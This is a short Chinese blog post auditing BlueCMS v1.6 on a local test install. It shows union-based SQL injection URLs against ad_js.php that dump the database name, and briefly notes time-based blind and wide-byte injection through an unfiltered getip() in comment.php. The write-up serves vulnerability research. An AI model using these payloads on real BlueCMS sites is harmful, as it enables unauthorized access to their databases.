BlueCMS v1.6

php安全

发布日期: 2022-03-15

更新日期: 2023-03-15

文章字数: 190

阅读时长: 1 分

BlueCMS v1.6审计

大致看了下几乎都包含了common.inc.php
ok，看一下这个全局配置文件:

在这里插入图片描述
看下deep_addslashes函数

就是简单重下了下addslashe函数，这里先看下Seay的自动审计结果，先不考虑利用有单双引号的

在这里插入图片描述

先去ad_js.php看下：
在这里插入图片描述
payload:

view-source:http://127.0.0.1/bluecms_v1.6_sp1/uploads/ad_js.php?ad_id=1%20order%20by%207

view-source:http://127.0.0.1/bluecms_v1.6_sp1/uploads/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,database()

注入成功：
在这里插入图片描述

在这里插入图片描述
getip()参数可控，虽然是单引号，但是在全局配置里没过滤$_SERVER：
comment.php有利用：

延时成功：

在这里插入图片描述
单引号包裹，可以调低下php版本试下宽字节：

盲注成功

admin/nav.php
在这里插入图片描述

wa1ki0g

http://example.com/2022/03/15/BlueCMS-v1-6/

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源 wa1ki0g !

php安全

2022-03-15 php安全

php安全

2022-03-15 app安全

app安全